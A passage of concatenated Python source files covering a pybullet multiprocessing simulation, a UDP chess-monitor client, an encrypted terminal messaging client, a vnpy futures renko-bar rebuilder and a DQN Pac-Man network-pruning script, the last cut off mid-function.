sim.configure_debug_visualizer(sim.COV_ENABLE_GUI, 0)
sim.set_gravity([0., 0., -9.81])
floor = sim.load_urdf('plane.urdf', use_fixed_base=True, scale=1.)
sphere = sim.load_urdf("sphere_small.urdf", position=[0, 0, 3])
while True:
print("{}: waiting for message...".format(process.name))
msg = pipe.recv()
print("{}: received msg: {}".format(process.name, msg))
if msg == 'stop':
break
else:
print('{}: running simulator'.format(process.name))
in_contact = None
for t in range(4000):
in_contact = len(sim.get_contact_points(sphere, floor))
sim.step(1. / 254)
queue.put([process.name, in_contact])
print("{}: end process".format(process.name))
pipe.close()
# create queue, pipe, and processes
print('creating queue, pipe, and processes')
queue = multiprocessing.Queue()
pipes = [multiprocessing.Pipe() for _ in range(num_processes)]
processes = [multiprocessing.Process(target=function, args=(pipe[1], queue, sim)) for pipe in pipes]
# start the processes
time.sleep(1.)
print('Start the processes')
for process in processes:
process.start()
# render back the simulator
sim.render()
# send msgs to each process to run the simulation
time.sleep(5)
print('Run each process')
for pipe in pipes:
pipe[0].send('run')
# get results from queue
print('Get the results from each process')
for _ in range(num_processes):
result = queue.get()
print("Result: {}".format(result))
# send msgs to each process to end the simulation
print('Stop each process')
for pipe in pipes:
pipe[0].send('stop')
# join the processes
for process in processes:
process.join()
print('END')
|
ChessMonitorClient.py | import threading
from client.UDPClient import UDPClient
from client.msg_parser import parse_cmd
class ChessMonitorClient(UDPClient):
def __init__(self, chess_board, server_addr=("localhost", 9998)):
super().__init__()
self.client_thread = threading.Thread(target=self.__recv_loop)
self.client_thread.daemon = True
self.server_addr = server_addr
self.chess_board = chess_board
def init(self):
self.sendto('init_monitor', self.server_addr)
data, addr = self.recvfrom()
print('Received', data, 'from', addr)
self.client_thread.start()
def start(self):
reqs = ['set_params 12 12', 'start_solving']
for req in reqs:
self.sendto(req, self.server_addr)
def __recv_loop(self):
while True:
data, addr = self.recvfrom()
print('Received', data, 'from', addr)
type, param = parse_cmd(data)
if type == 'board_size':
print(type, param)
self.chess_board.set_size(param)
elif type == 'board':
print(type, param)
self.chess_board.set_positions(param)
elif type == 'result':
self.chess_board.set_score(param)
|
m_client.py | '''
## MESSAGING CLIENT 1.0
##
## This is a simple client side app that connects to the messaging server and provides End to End Encryption
## All messages tranfered between clients is indecipherable to all except communicating parties
## Users can register for accounts with the chosen server.
## You can also transfer files which will also be encrypted during transit.
## To transfer files, in the "Enter message: " prompt type "file: (filename)" without quotes,
## ...File must be within the same folder as this file (m_client.py) in order for it to work.
##
## Messages use a json based api
##
## IMPORTANT: If you wish to have multiple accounts, you must create a separate folder for
## each user, each containing the m_client.py and encryption_engine.py files.
## ...DO NOT login to another account from the wrong account folder.
## ...This is because of how the encryption keys are stored
##
## Author: Shimpano Mutangama
'''
import socket
import threading
import json
import sqlite3
import time
import sys
from encryption_engine import EncryptionEngine
import getpass
from io import BytesIO
class Client(object):
def __init__(self,host,port):
self._logged_user = None
self._remote_user_key = None
self._logged_user_api_key = None
self._server_tuple = (host,port)
self.client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self._encryption_engine = EncryptionEngine()
self._prepare_app()
self._main_option_menu()
self._initialize_waiting_thread()
self._user_option_menu()
def _poll_server_connection(self,server_tuple):
#Keep trying to connect every 5 seconds until server is found and online
while True:
try:
self.client_socket.connect(server_tuple)
break
except:
time.sleep(5)
def _prepare_app(self):
#This generates the public and private keys and creates the local database
#in SQLite
conn = sqlite3.connect("local.db")
cursor = conn.cursor()
#Create Tables if none exist
user_key_table_sql = "CREATE TABLE IF NOT EXISTS userkeys (id INTEGER PRIMARY KEY NOT NULL,username varchar(200),prikey varchar(2000),pubkey varchar(2000))"
shared_key_table_sql = "CREATE TABLE IF NOT EXISTS sharedkeys (id INTEGER PRIMARY KEY NOT NULL,username varchar(200),symkey varchar(2000))"
message_table_sql = "CREATE TABLE IF NOT EXISTS messages (id INTEGER PRIMARY KEY NOT NULL, message varchar(200), sender varchar(200), receipient varchar(200), date varchar(200))"
cursor.execute(shared_key_table_sql)
cursor.execute(message_table_sql)
cursor.execute(user_key_table_sql)
#Check if you have generated your private keys
check_keys_sql = 'SELECT pubkey,prikey FROM userkeys WHERE username=?'
record = conn.execute(check_keys_sql,("device",))
keys = record.fetchone()
if keys is not None:
pass
else:
self._encryption_engine.generate_private_public_key()
print "Done preparing app"
conn.commit()
conn.close()
def _main_option_menu_header(self):
print ""
print "********* MESSAGING SERVICE *********"
print "1. Register a User "
print "2. Login a User "
print ""
def _main_option_menu(self):
self._main_option_menu_header()
while True:
print "> ",
menu_choice = raw_input("")
if menu_choice == "1":
print""
username = raw_input("Choose a Username: ")
password = getpass.getpass("Choose a Password: ")
print "Connecting to Server"
self._poll_server_connection(self._server_tuple)
public_key = self._encryption_engine.fetch_public_key()
request_json = '{"username":"%s","password":"%s","public_key":"%s","type":"registration"}'%(username,password,public_key)
self.client_socket.sendall(request_json)
elif menu_choice == "2":
print""
username = raw_input("Enter username: ")
password = getpass.getpass("Enter password: ")
print "Connecting to Server"
self._poll_server_connection(self._server_tuple)
request_json = '{"username":"%s","password":"%s","type":"login"}'%(username,password)
self.client_socket.sendall(request_json)
response = self.client_socket.recv(1024)
response_json = json.loads(response)
if response_json["success"] == True:
self._logged_user = username
self._logged_user_api_key = response_json["api_key"]
break
else:
self.client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print""
print response_json["reason"]
print""
def _initialize_waiting_thread(self):
#This thread waits to receive messages from the server and other users
t = threading.Thread(target = self._wait_for_messages)
t.daemon = True
t.start()
def _wait_for_messages(self):
try:
while True:
chunk = self.client_socket.recv(1024)
response = ''
while chunk:
if chunk[-2:] == "/0":
response+=chunk[:-2]
break
response+= chunk
chunk = self.client_socket.recv(1024)
print"Response is: %s"%response
self._handle_message_response(response)
except:
print"Shutting down.."
def _handle_message_response(self,response):
try:
json_data = json.loads(response)
if json_data["type"] == "message":
#Handles when user receives a message
sender = json_data["sender"]
date = json_data["date"]
message = json_data["message"]
receipient = json_data["receipient"]
shared_key = self._encryption_engine.fetch_local_shared_key(sender)
decrypted_text = self._encryption_engine.decrypt_text(message,shared_key)
print"\nMessage Received"
print""
print"From: %s"%sender
print"Date: %s"%date
print"Message: %s"%decrypted_text
print""
conn = sqlite3.connect('local.db')
cursor = conn.cursor()
cursor.execute('INSERT INTO messages (message,sender,receipient,date) VALUES (?,?,?,?)',(decrypted_text,sender,receipient,date))
conn.commit()
conn.close()
elif json_data["type"] == "file":
#Handles receiving of a file, after receiving a filename
sender = json_data["sender"]
shared_key = self._encryption_engine.fetch_local_shared_key(sender)
filename = self._encryption_engine.decrypt_text(json_data["message"],shared_key)
print "Receiving %s from %s, please wait...."%(filename,sender)
#Prevent recv from taking too long
self.client_socket.settimeout(5)
try:
with open(filename,"wb") as f:
chunk = self.client_socket.recv(1024)
data = ''
if chunk == "/0end":
pass
else:
while chunk:
if chunk[-5:] == '/0end':
data+=chunk[:-5]
break
data+=chunk
chunk = self.client_socket.recv(1024)
decrypted_data = self._encryption_engine.decrypt_file(data,shared_key)
f.write(decrypted_data)
except:
pass
self.client_socket.settimeout(None)
print "File Received"
elif json_data["type"] == "unread":
unread_messages = json_data["objects"]
for message in unread_messages:
sender = message["sender"]
date = message["date"]
message_text = message["message"]
receipient = message["receipient"]
shared_key = self._encryption_engine.fetch_local_shared_key(sender)
decrypted_text = self._encryption_engine.decrypt_text(message_text,shared_key)
print""
print"From: %s"%sender
print"Date: %s"%date
print"Message: %s"%decrypted_text
print""
conn = sqlite3.connect('local.db')
cursor = conn.cursor()
cursor.execute('INSERT INTO messages (message,sender,receipient,date) VALUES (?,?,?,?)',(decrypted_text,sender,receipient,date))
conn.commit()
conn.close()
elif json_data["type"] == "alert":
#Handles alerts like success and fails
message = json_data["message"]
#This helps throw an exception if encryption is tried
#on a non existent key
if json_data["success"] == False:
self._remote_user_key = 0
print""
print"Alert: %s"%message
print""
elif json_data["type"] == "publickey":
#Handles response when you fetch a public key remotely
username = json_data["username"]
public_key = json_data["public_key"]
print""
print"Public Key for %s: %s"%(username,public_key)
print""
self._remote_user_key = public_key
elif json_data["type"] == "sharedkey":
#Handle when a user sends you a shared key
#Receives key and saves it to the database
message = json_data["message"]
sender = json_data["sender"]
private_key = self._encryption_engine.fetch_private_key()
decrypted_shared_key = self._encryption_engine.decrypt_key(message,private_key)
self._encryption_engine.save_shared_key(sender,decrypted_shared_key)
print""
self._user_option_menu_header()
except:
if response == 'sent':
print""
print"Success"
print""
else:
print""
print"Failed"
print""
raise
self._user_option_menu_header()
def _user_option_menu_header(self):
print ""
print "1. Send Message "
print "2. View Conversation "
print "3. View Inbox "
print "4. View Outbox "
print "5. View Unread "
print "6. Exit "
print ""
print "> ",
def _user_option_menu(self):
self._user_option_menu_header()
while True:
menu_option = raw_input("")
if menu_option == "1":
self._send_message_method()
elif menu_option == "2":
self._view_conversation_method()
elif menu_option == "3":
self._view_inbox_method()
elif menu_option == "4":
self._view_outbox_method()
elif menu_option == "5":
self._view_unread_method()
elif menu_option == "6":
sys.exit(0)
def _fetch_remote_public_key(self,user):
json_request = '{"username":"%s","logged_user":"%s","api_key":"%s","type":"publickey"}'%(user,self._logged_user,self._logged_user_api_key)
self.client_socket.sendall(json_request)
self.client_socket.send("/0")
timeout = 5
count = 0
while self._remote_user_key is None:
#Check every second if the remote key was fetched
time.sleep(1)
#If server responds with code 0 (from the receiving thread) set key to None
#The try catch will throw an exception an fail gracefully
if self._remote_user_key == 0:
self._remote_user_key = None
break
remote_key = self._remote_user_key
self._remote_user_key = None
return remote_key
def _send_message_method(self):
IS_FILE = False
print ""
message = raw_input("Enter message: ")
receipient = raw_input("Enter recipient: ")
print ""
if message[:6] == "file: ":
IS_FILE = True
message_list = message.split("file: ")
message = message_list[1]
filename = message
sender = self._logged_user
shared_key = self._encryption_engine.fetch_local_shared_key(receipient)
try:
if shared_key is not None:
#The user has a shared key stored for recipient, so head straight to encryption
encrypted_text = self._encryption_engine.encrypt_text(message,shared_key)
else:
#The user has no shared key stored for the recipient,
#so generate and send them a shared key
#fetch remote public key
public_key = self._fetch_remote_public_key(receipient)
#print "Public key fetched"
#generate shared key
shared_key = self._encryption_engine.generate_shared_key()
#print "Shared key generated"
#encrypt shared key with public key
encrypted_shared_key = self._encryption_engine.encrypt_key(shared_key,public_key)
#print"Shared key encrypted"
#save shared key and username to database
self._encryption_engine.save_shared_key(receipient,shared_key)
#print "Shared key saved"
#send to receipient
request_json = '{"sender":"%s","receipient":"%s","logged_user":"%s","message":"%s","api_key":"%s","type":"sharedkey"}'%(sender,receipient,sender,encrypted_shared_key,self._logged_user_api_key)
self.client_socket.sendall(request_json)
self.client_socket.send("/0")
#This wait is just so the recipient of the message can do all necessary calculations and store the key
time.sleep(5)
encrypted_text = self._encryption_engine.encrypt_text(message,shared_key)
#Finally send the (encrypted) message
if IS_FILE == False:
message_json = '{"message":"%s", "receipient":"%s", "sender":"%s", "logged_user":"%s", "api_key":"%s","type":"message"}'%(encrypted_text,receipient,sender,self._logged_user,self._logged_user_api_key)
self.client_socket.sendall(message_json)
self.client_socket.send("/0")
current_time_epoch = time.time()
time_format = '%Y/%m/%d %H:%M:%S'
date = time.strftime(time_format,time.localtime(current_time_epoch))
conn = sqlite3.connect('local.db')
cursor = conn.cursor()
cursor.execute('INSERT INTO messages (message,sender,receipient,date) VALUES (?,?,?,?)',(message,sender,receipient,date))
conn.commit()
conn.close()
else:
try:
with open(filename,"rb") as f:
print "Sending file to %s...."%receipient
message_json = '{"message":"%s", "receipient":"%s", "sender":"%s", "logged_user":"%s", "api_key":"%s","type":"file"}'%(encrypted_text,receipient,sender,self._logged_user,self._logged_user_api_key)
self.client_socket.sendall(message_json)
self.client_socket.send("/0")
data = f.read()
encrypted_data = self._encryption_engine.encrypt_file(data,shared_key)
self.client_socket.sendall(encrypted_data+"/0end")
print "Done!"
except:
print "There was an error... Check that file exists"
self._user_option_menu_header()
pass
except:
#"There was an error!"
pass
def _view_conversation_method(self):
print ""
user1 = raw_input("View conversation with: ")
print""
user2 = self._logged_user
conn = sqlite3.connect("local.db")
cursor = conn.cursor()
conversation_sql = 'SELECT message,sender,receipient,date FROM messages WHERE (sender=? AND receipient=?) OR (sender=? AND receipient=?)'
messages = cursor.execute(conversation_sql,(user1,user2,user2,user1))
for message in messages:
print""
print"From: %s"%message[1]
print"To: %s"%message[2]
print"Date: %s"%message[3]
print"Message: %s"%message[0]
print""
self._user_option_menu_header()
def _view_inbox_method(self):
conn = sqlite3.connect("local.db")
cursor = conn.cursor()
receipient = self._logged_user
view_received_messages_sql = 'SELECT message,sender,receipient,date FROM messages WHERE receipient=?'
messages = cursor.execute(view_received_messages_sql,(receipient,))
for message in messages:
print""
print"From: %s"%message[1]
print"Date: %s"%message[3]
print"Message: %s"%message[0]
print""
conn.close()
self._user_option_menu_header()
def _view_unread_method(self):
request = '{"logged_user":"%s","api_key":"%s","type":"unread"}'%(self._logged_user,self._logged_user_api_key)
self.client_socket.sendall(request)
self.client_socket.send("/0")
def _view_outbox_method(self):
conn = sqlite3.connect("local.db")
cursor = conn.cursor()
sender = self._logged_user
view_received_messages_sql = 'SELECT message,sender,receipient,date FROM messages WHERE sender=?'
messages = cursor.execute(view_received_messages_sql,(sender,))
for message in messages:
print""
print"To: %s"%message[2]
print"Date: %s"%message[3]
print"Message: %s"%message[0]
print""
conn.close()
self._user_option_menu_header()
if __name__=="__main__":
HOST = '127.0.0.1'
PORT = 1000
client = Client(HOST,PORT)
|
rebuild_future.py | # encoding: UTF-8
import os
import copy
import csv
import signal
import traceback
from datetime import datetime, timedelta
from queue import Queue
from time import sleep
from threading import Thread
from vnpy.data.mongo.mongo_data import MongoData
from vnpy.data.tdx.tdx_common import FakeStrategy, get_future_contracts
from vnpy.data.tdx.tdx_future_data import TdxFutureData
from vnpy.data.renko.config import HEIGHT_LIST, FUTURE_RENKO_DB_NAME
from vnpy.app.cta_strategy_pro.cta_renko_bar import CtaRenkoBar
from vnpy.trader.object import TickData, RenkoBarData, Exchange, Color
from vnpy.trader.utility import get_trading_date, get_underlying_symbol
class FutureRenkoRebuilder(FakeStrategy):
"""
国内商品期货指数合约砖图bar重建
"""
def __init__(self, setting: dict = {}):
self.tdx_api = None
self.queue = Queue()
self.active = False
self.loaded = False
self.thread = None
self.symbol = None
self.underlying_symbol = None
self.price_tick = 1
self.exchange = None
self.renko_bars = {} # bar_name: renko_bar
self.setting = setting
self.mongo_client = MongoData(host=self.setting.get('host', 'localhost'), port=self.setting.get('port', 27017))
self.db_name = setting.get('db_name', FUTURE_RENKO_DB_NAME)
self.last_close_dt_dict = {}
self.future_contracts = get_future_contracts()
self.cache_folder = setting.get('cache_folder', None)
def get_last_bar(self, renko_name):
"""
通过mongo获取最新一个bar的数据
:param renko_name:
:return:
"""
qryData = self.mongo_client.db_query_by_sort(db_name=self.db_name,
col_name=renko_name,
filter_dict={},
sort_name='datetime',
sort_type=-1,
limitNum=1)
last_renko_close_dt = None
bar = None
for d in qryData:
bar = RenkoBarData(gateway_name='tdx', exchange=Exchange.LOCAL, datetime=None, symbol=self.symbol)
d.pop('_id', None)
bar.__dict__.update(d)
bar.exchange = Exchange(d.get('exchange'))
bar.color = Color(d.get('color'))
last_renko_open_dt = d.get('datetime', None)
if last_renko_open_dt is not None:
last_renko_close_dt = last_renko_open_dt + timedelta(seconds=d.get('seconds', 0))
break
return bar, last_renko_close_dt
def start(self, symbol, price_tick, height, start_date='2016-01-01', end_date='2099-01-01', refill=False):
"""启动重建工作"""
self.underlying_symbol = get_underlying_symbol(symbol).upper()
self.symbol = symbol.upper()
self.price_tick = price_tick
info = self.future_contracts.get(self.underlying_symbol, None)
if info:
self.exchange = Exchange(info.get('exchange'))
else:
self.exchange = Exchange.LOCAL
if not isinstance(height, list):
height = [height]
db_last_close_dt = None
for h in height:
bar_name = '{}_{}'.format(self.symbol, h)
bar_setting = {'name': bar_name,
'underlying_symbol': self.underlying_symbol,
'symbol': self.symbol,
'price_tick': price_tick}
# 是否使用平滑
if isinstance(h, str) and h.endswith('s'):
h = h.replace('s', '')
bar_setting.update({'activate_ma_tick': True})
if 'K' not in h:
h = int(h)
if isinstance(h, str) and 'K' in h:
kilo_height = int(h.replace('K', ''))
renko_height = price_tick * kilo_height
self.write_log(u'使用价格千分比:{}'.format(h))
bar_setting.update({'kilo_height': kilo_height})
else:
self.write_log(u'使用绝对砖块高度数:{}'.format(h))
renko_height = price_tick * int(h)
bar_setting.update({'height': renko_height})
self.renko_bars[bar_name] = CtaRenkoBar(None, cb_on_bar=self.on_bar_renko, setting=bar_setting)
if refill:
bar, bar_last_close_dt = self.get_last_bar(bar_name)
if bar:
self.write_log(u'重新添加最后一根{} Bar:{}'.format(bar_name, bar.__dict__))
# 只添加bar,不触发onbar事件
self.renko_bars[bar_name].add_bar(bar, is_init=True)
# 重新计算砖块高度
self.renko_bars[bar_name].update_renko_height(bar.close_price, renko_height)
if bar_last_close_dt:
self.last_close_dt_dict.update({bar_name: bar_last_close_dt})
if db_last_close_dt:
db_last_close_dt = min(bar_last_close_dt, db_last_close_dt)
else:
db_last_close_dt = bar_last_close_dt
# 创建tick更新线程
self.thread = Thread(target=self.run, daemon=True)
self.active = True
self.thread.start()
self.check_index()
# 创建tdx连接
self.tdx_api = TdxFutureData(self)
# 开始时间~结束时间
start_day = datetime.strptime(start_date, '%Y-%m-%d')
if isinstance(db_last_close_dt, datetime):
if start_day < db_last_close_dt:
start_day = db_last_close_dt - timedelta(days=3)
end_day = datetime.strptime(end_date, '%Y-%m-%d')
cur_trading_date = get_trading_date(datetime.now())
if end_day >= datetime.now():
end_day = datetime.strptime(cur_trading_date, '%Y-%m-%d') + timedelta(days=1)
self.write_log(u'结束日期=》{}'.format(cur_trading_date))
days = (end_day - start_day).days + 1
self.write_log(u'数据范围:{}~{},{}天'.format(start_day.strftime('%Y-%m-%d'), end_day.strftime('%Y-%m-%d'), days))
self.loaded = False
last_tick_dt = None
try:
for i in range(days):
trading_day = start_day + timedelta(days=i)
self.write_log(u'获取{}分笔交易数据'.format(trading_day.strftime('%Y-%m-%d')))
ret, result = self.tdx_api.get_history_transaction_data(self.symbol, trading_day.strftime('%Y%m%d'),
self.cache_folder)
if not ret:
self.write_error(u'取{} {}数据失败'.format(trading_day, self.symbol))
continue
for data in result:
dt = data.get('datetime')
# 更新tick时间
if last_tick_dt is None:
last_tick_dt = dt
if last_tick_dt > dt:
continue
last_tick_dt = dt
# 如果tick时间比数据库的记录时间还早,丢弃
if db_last_close_dt:
if dt < db_last_close_dt:
continue
price = data.get('price')
volume = data.get('volume')
self.queue.put(item=(dt, price, volume))
sleep(5)
except Exception as ex:
self.write_error(u'tdx下载数据异常:{}'.format(str(ex)))
self.write_error(traceback.format_exc())
self.tdx_api = None
self.write_log(u'加载完毕')
self.loaded = True
while self.active:
sleep(1)
self.exit()
def run(self):
"""处理tick数据"""
self.write_log(u'启动处理tick线程')
while self.active:
try:
dt, price, volume = self.queue.get(timeout=1)
tick = TickData(gateway_name='tdx', symbol=self.symbol, exchange=self.exchange, datetime=dt)
tick.date = tick.datetime.strftime('%Y-%m-%d')
tick.time = tick.datetime.strftime('%H:%M:%S')
tick.trading_day = get_trading_date(tick.datetime)
tick.last_price = float(price)
tick.volume = int(volume)
for bar_name, renko_bar in self.renko_bars.items():
last_dt = self.last_close_dt_dict.get(bar_name, None)
if last_dt and tick.datetime < last_dt:
continue
if tick.datetime.hour in [8, 20]:
continue
if self.underlying_symbol in ['T', 'TF', 'TS', 'IF', 'IH', 'IC']:
if tick.datetime.hour == 9 and tick.datetime.minute < 30:
continue
renko_bar.on_tick(tick)
except Exception as ex:
if self.queue.empty() and self.loaded:
self.active = False
self.write_log(u'队列清空完成')
if str(ex) not in ['', 'Empty']:
self.write_error(traceback.format_exc())
self.write_log(u'处理tick线程结束')
def exit(self):
"""结束并退出"""
self.write_log(u'重建结束')
if self.thread:
self.thread.join()
try:
self.thread = None
self.queue = None
except Exception:
pass
os.kill(os.getpid(), signal.SIGTERM)
def on_bar_renko(self, bar, bar_name):
"""bar到达,入库"""
flt = {'datetime': bar.datetime, 'open': bar.open_price, 'close': bar.close_price, 'volume': bar.volume}
d = copy.copy(bar.__dict__)
d.pop('row_data', None)
# 转换数据,解决vnpy2.0中对象命名不合理得地方
d.update({'exchange': bar.exchange.value})
d.update({'color': bar.color.value})
d.update({'open': d.pop('open_price')})
d.update({'close': d.pop('close_price')})
d.update({'high': d.pop('high_price')})
d.update({'low': d.pop('low_price')})
try:
self.mongo_client.db_update(self.db_name, bar_name, d, flt, True)
self.write_log(u'new Renko Bar:{},dt:{},open:{},close:{},high:{},low:{},color:{}'
.format(bar_name, bar.datetime, bar.open_price, bar.close_price, bar.high_price,
bar.low_price, bar.color.value))
except Exception as ex:
self.write_error(u'写入数据库异常:{},bar:{}'.format(str(ex), d))
def update_last_dt(self, symbol, height):
"""更新最后的时间到主力合约设置"""
if not symbol.endswith('99'):
return
bar, last_dt = self.get_last_bar('_'.join([symbol, str(height)]))
if not last_dt:
return
flt = {'short_symbol': symbol.replace('99', '')}
d = {'renko_{}'.format(height): last_dt.strftime('%Y-%m-%d %H:%M:%S') if isinstance(last_dt,
datetime) else last_dt}
self.write_log(u'更新主力合约表中:{}的renko bar {}_{}最后时间:{}'.format(symbol.replace('99', ''), symbol, height, d))
self.mongo_client.db_update(db_name='Contract', col_name='mi_symbols', filter_dict=flt, data_dict=d,
upsert=False,
replace=False)
def check_index(self):
"""检查索引是否存在,不存在就建立新索引"""
for col_name in self.renko_bars.keys():
self.write_log(u'检查{}.{}索引'.format(self.db_name, col_name))
self.mongo_client.db_create_index(dbName=self.db_name, collectionName=col_name, indexName='datetime',
sortType=1)
self.mongo_client.db_create_multi_index(db_name=self.db_name, col_name=col_name,
index_list=[('datetime', 1), ('open', 1), ('close', 1),
('volume', 1)])
symbol, height = col_name.split('_')
self.write_log(u'更新{}最后日期'.format(col_name))
self.update_last_dt(symbol, height)
def check_all_index(self):
"""检查所有索引"""
contracts = self.mongo_client.db_query(db_name='Contract', col_name='mi_symbols', filter_dict={},
sort_key='short_symbol')
for contract in contracts:
short_symbol = contract.get('short_symbol')
for height in HEIGHT_LIST:
col_name = '{}99_{}'.format(short_symbol, height)
self.write_log(u'检查{}.{}索引'.format(self.db_name, col_name))
self.mongo_client.db_create_index(dbName=self.db_name, collectionName=col_name, indexName='datetime',
sortType=1)
self.mongo_client.db_create_multi_index(db_name=self.db_name, col_name=col_name,
index_list=[('datetime', 1), ('open', 1), ('close', 1),
('volume', 1)])
symbol, height = col_name.split('_')
self.write_log(u'更新{}最后日期'.format(col_name))
self.update_last_dt(symbol, height)
def export(self, symbol, height=10, start_date='2016-01-01', end_date='2099-01-01', csv_file=None):
""" 导出csv"""
qry = {'tradingDay': {'$gt': start_date, '$lt': end_date}}
results = self.mongo_client.db_query_by_sort(db_name=self.db_name, col_name='_'.join([symbol, str(height)]),
filter_dict=qry, sort_name='$natural', sort_type=1)
if len(results) > 0:
self.write_log(u'获取数据:{}条'.format(len(results)))
header = None
if csv_file is None:
csv_file = 'future_renko_{}_{}_{}_{}.csv'.format(symbol, height, start_date.replace('-', ''),
end_date.replace('-', ''))
f = open(csv_file, 'w', encoding=u'utf-8', newline="")
dw = None
for data in results:
data.pop('_id', None)
data['index'] = data.pop('datetime', None)
data['trading_date'] = data.pop('trading_day', None)
# 排除集合竞价导致的bar
bar_start_dt = data.get('index')
if bar_start_dt is None or not isinstance(bar_start_dt, datetime):
continue
bar_end_dt = bar_start_dt + timedelta(seconds=int(data.get('seconds', 0)))
if bar_start_dt.hour in [8, 20] and bar_end_dt.hour in [8, 20]:
continue
if header is None and dw is None:
header = sorted(data.keys())
header.remove('index')
header.insert(0, 'index')
dw = csv.DictWriter(f, fieldnames=header, dialect='excel', extrasaction='ignore')
dw.writeheader()
if dw:
dw.writerow(data)
f.close()
self.write_log(u'导出成功,文件:{}'.format(csv_file))
else:
self.write_error(u'导出失败')
def export_refill_scripts(self):
contracts = self.mongo_client.db_query(db_name='Contract', col_name='mi_symbols', filter_dict={},
sort_key='short_symbol')
for contract in contracts:
short_symbol = contract.get('short_symbol')
min_diff = contract.get('priceTick')
command = 'python refill_renko.py {} {}99 {}'.format(self.setting.get('host', 'localhost'),
short_symbol.upper(), min_diff)
self.write_log(command)
def export_all(self, start_date='2016-01-01', end_date='2099-01-01', csv_folder=None):
contracts = self.mongo_client.db_query(db_name='Contract', col_name='mi_symbols', filter_dict={},
sort_key='short_symbol')
for contract in contracts:
short_symbol = contract.get('short_symbol')
symbol = '{}99'.format(short_symbol)
self.write_log(u'导出:{}合约'.format(short_symbol))
for height in HEIGHT_LIST:
if csv_folder:
csv_file = os.path.abspath(os.path.join(csv_folder, 'future_renko_{}_{}_{}_{}.csv'
.format(symbol, height, start_date.replace('-', ''),
end_date.replace('-', ''))))
else:
csv_file = None
self.export(symbol, height, start_date, end_date, csv_file)
|
prune.py | import gym
from model import DQNPacman, PacmanTargetNet, StudentPacman
from configs import DensePacmanAgentConfig as dense_config
from configs import PrunePacmanAgentConfig as prune_config
from configs import StudentPacmanConfig as student_config
from Pacman.evaluate import evaluate
from utils.Memory import ExperienceReplayMultistep, MultiStepPrioritizedExperienceReplay, Supervised_ExperienceReplay,\
Supervised_Prioritzed_ExperienceReplay
import numpy as np
from Pacman.train import train_on_batch, train_on_batch_with_benchmark
from utils.plot_utils import plot_graph, plot_nnz_vs_accuracy
from utils.logger_utils import get_logger
from multiprocessing import Process, Queue
from Pacman.processor import process_observation, process_state_batch, init_state, append_frame
from Pacman.accumulate_experience_Pacman import accumulate_experience
USE_PER = 0
def prune_DQN():
logger = get_logger("prune_pacman_agent_using_DQN")
prune_model = DQNPacman(input_size=prune_config.input_size, output_size=prune_config.output_size,
model_path=prune_config.model_path, scope=prune_config.scope,
epsilon_stop=prune_config.final_epsilon, epsilon=prune_config.initial_epsilon,
pruning_end=prune_config.pruning_end,
pruning_freq=prune_config.pruning_freq,
sparsity_end=prune_config.sparsity_end,
target_sparsity=prune_config.target_sparsity,
prune_till_death=True)
target_model = PacmanTargetNet(input_size=dense_config.input_size, output_size=dense_config.output_size)
logger.info("loading models")
target_model.load_model(dense_config.ready_path)
prune_model.load_model(dense_config.ready_path)
prune_model.reset_global_step()
logger.info("Commencing iterative pruning")
sparsity_vs_accuracy = iterative_pruning(logger, prune_model, target_model, prune_config.n_epoch)
print("dqn finished")
plot_graph(sparsity_vs_accuracy, "sparsity_vs_accuracy", figure_num=1)
prune_model.sess.close()
def iterative_pruning(logger, agent, target_agent, n_epoch, benchmarking=False):
env = gym.make('MsPacmanDeterministic-v4')
if USE_PER:
exp_replay = MultiStepPrioritizedExperienceReplay(size=dense_config.memory_size, gamma=agent.gamma,
alpha=dense_config.ALPHA_PER)
else:
exp_replay = ExperienceReplayMultistep(size=dense_config.memory_size, gamma=agent.gamma)
total_steps = 0
sparsity_vs_accuracy = [[], []]
counter_for_consecutive_failed_trials = 0
counter_for_last_evaluation = 0
stop_prune = False
finished = False
last_sparsity_measure = -1
sparsity_converged = 0
for e in range(n_epoch):
state = init_state()
observation = env.reset()
observation = process_observation(observation)
done = False
state = append_frame(state, observation)
while not done:
total_steps += 1
q_values = agent.get_q(state=np.expand_dims(state, axis=0))
action = agent.select_action(qValues=q_values, explore=False)
next_observation, reward, done, _ = env.step(action)
next_observation = process_observation(next_observation)
next_state = append_frame(state, next_observation)
exp_replay.add_memory(state, action, reward, next_state, done,
total_steps % dense_config.steps_per_train == 0) # transaction are inserted after steps per train
state = next_state
if total_steps < prune_config.OBSERVE: # filling up the experience replay
continue
if total_steps % dense_config.steps_per_train == 0:
if not benchmarking:
train_on_batch(agent, target_agent, exp_replay, e, config=prune_config)
else:
train_on_batch_with_benchmark(agent, target_agent, exp_replay, e, config=prune_config)
if not stop_prune: # this signal is down when the agent needs to recover from pruning
agent.prune()
if e % 10 == 0:
score = evaluate(agent=agent, n_epoch=student_config.eval_prune)
sparsity = agent.get_model_sparsity()
if last_sparsity_measure < sparsity: # expect the sparsity to get bigger
NNZ = agent.get_number_of_nnz_params() # for paper
sparsity_vs_accuracy[1].append(score)
sparsity_vs_accuracy[0].append(NNZ) # 0 is sparsity and 1 is score
last_sparsity_measure = sparsity
sparsity_converged = 0
elif score > sparsity_vs_accuracy[1][-1]: # better performance for current sparsity
sparsity_vs_accuracy[1][-1] = score
if last_sparsity_measure >= sparsity: # sparsity remained un changed
sparsity_converged += 1
print("Episode {} / {} : accuracy is {} with sparsity {} , reward {}"
.format(e, n_epoch, sparsity_vs_accuracy[1][-1], sparsity, score))
logger.info("Episode {} / {} : accuracy is {} with sparsity {} "
.format(e, n_epoch, sparsity_vs_accuracy[1][-1], sparsity))
if total_steps >= prune_config.OBSERVE:
if score > dense_config.OBJECTIVE_SCORE:
if stop_prune:
stop_prune = False
freeze_global_step = agent.unfreeze_global_step()
logger.info("agent got back on the horse and managed to score 18 plus,"
" continue pruning with global step {}".format(freeze_global_step))
logger.info("Saved best model with average score of {} and NNZ params {}".format(sparsity_vs_accuracy[1][-1], sparsity_vs_accuracy[0][-1]))
agent.save_model(prune_config.best_path)
if score < dense_config.LOWER_BOUND or finished:
if not stop_prune and not finished:
stop_prune = True
freeze_global_step = agent.freeze_global_step() # algorithm works with global step
logger.info("stopped pruning due to low results, global step is {}".format(freeze_global_step))
counter_for_consecutive_failed_trials += 1
logger.info("consecutive trials failed {}".format(counter_for_consecutive_failed_trials))
if counter_for_consecutive_failed_trials >= 10 or sparsity_converged >= 10 or finished:
if finished:
counter_for_last_evaluation += 1
stop_prune = False
if counter_for_last_evaluation > 10:
